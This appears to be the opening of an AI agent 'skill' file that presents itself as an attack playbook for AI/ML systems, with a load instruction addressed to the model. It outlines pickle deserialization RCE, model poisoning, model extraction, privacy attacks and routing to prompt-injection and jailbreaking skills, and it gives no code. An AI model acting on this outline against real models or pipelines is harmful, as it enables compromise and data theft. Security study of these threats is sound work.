ai-ml-security
Installation
SKILL.md
SKILL: AI/ML Security — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.
0. RELATED ROUTING
- llm-prompt-injection for LLM-specific prompt injection, jailbreaking, and tool abuse techniques
- deserialization-insecure for deeper coverage of Python pickle and general deserialization attack patterns
- dependency-confusion when the ML pipeline has supply chain risks via pip/npm package confusion
1. MODEL SUPPLY CHAIN ATTACKS
1.1 Malicious Model Files — Pickle RCE
Python's pickle module executes arbitrary code during deserialization. PyTorch .pt/.pth files use pickle by default.
Related skills